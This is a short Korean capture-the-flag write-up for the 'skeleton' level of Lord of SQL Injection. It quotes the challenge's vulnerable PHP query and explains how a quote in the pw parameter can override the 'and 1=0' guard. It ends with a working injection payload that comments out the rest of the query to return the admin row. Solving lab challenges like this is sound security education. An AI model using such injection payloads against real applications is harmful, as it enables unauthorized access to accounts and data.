Web/Lord of Sql Injection
LOS skeleton
언우s
2018. 4. 11. 09:48
10. skeleton
// Challenge query as quoted in this write-up: the raw pw request parameter is
// interpolated straight into a single-quoted SQL string literal, and no
// escaping or parameter binding is visible in this excerpt. Input containing a
// quote can therefore change the WHERE clause itself, including the trailing
// "and 1=0" guard. Binding pw as a prepared-statement parameter would keep it
// as data instead of SQL syntax.
$query = "select id from prob_skeleton where id='guest' and pw='{$_GET[pw]}' and 1=0";
쿼리 끝에 붙은 and 1=0 때문에 where 절이 항상 거짓이 되어 결과는 무조건 false
// Solve condition: the id field of $result must equal 'admin' (loose ==
// comparison). $result is populated outside this excerpt; presumably it is the
// row fetched for $query, to be confirmed against the full challenge source.
if($result['id'] == 'admin') solve("skeleton");
조회된 결과의 id가 admin이어야 함
pw 값이 쿼리 문자열에 그대로 삽입되므로, 뒤에 붙는 and 1=0을 #으로 주석 처리
?pw=%27%20or%20id=%27admin%27%23